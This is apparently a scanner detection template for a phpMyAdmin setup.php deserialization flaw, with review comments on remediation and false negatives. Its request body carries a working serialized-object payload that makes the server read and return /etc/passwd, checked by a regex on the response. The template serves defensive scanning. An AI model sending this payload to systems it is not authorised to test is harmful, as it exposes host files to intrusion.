漏洞描述
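phpMyAdmin setup script deserialization vulnerability: the detection template below checks whether `/scripts/setup.php` unserializes the request's `configuration` parameter and returns the contents of a local file.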
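# Detection template for the phpMyAdmin setup-script deserialization issue.
# The nesting below was flattened on the page and is restored here so that
# `info`, `rules` and the two `expression` keys no longer collide at top level.
#
# NOTE(review): the page names no advisory or affected version range. Add a
# `reference:` entry under `info` once confirmed, e.g.
#   reference: <vendor advisory URL - not given on this page>
id: phpmyadmin-setup-deserialization

info:
  name: Phpmyadmin Setup Deserialization
  author: p0wd3r
  severity: high
  description: |-
    Phpmyadmin Setup Deserialization Vulnerability
  tags: phpmyadmin,deserialization
  created: 2023/10/13

rules:
  r0:
    request:
      method: POST
      # Remediation: delete or block web access to the setup script after
      # installation, and move to a maintained phpMyAdmin release.
      # Log/WAF signal: a POST to this path whose `configuration` parameter
      # starts with a PHP serialized-object marker (`O:`).
      path: /scripts/setup.php
      # NOTE(review): no Content-Type header is set for this form body.
      # Confirm the scan engine defaults to form encoding; otherwise the
      # check may report a false negative.
      body: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
    # A 200 response containing a passwd-style `root` entry suggests the
    # endpoint unserialized request data and read the file named in `source`.
    # The pattern is Unix-only: non-Unix hosts, or hosts where PHP cannot
    # read that file (e.g. open_basedir), will not match even if the
    # deserialization flaw is present, so a negative result is not proof
    # of a fix.
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

# The template reports a finding only when rule r0 matches.
expression: r0()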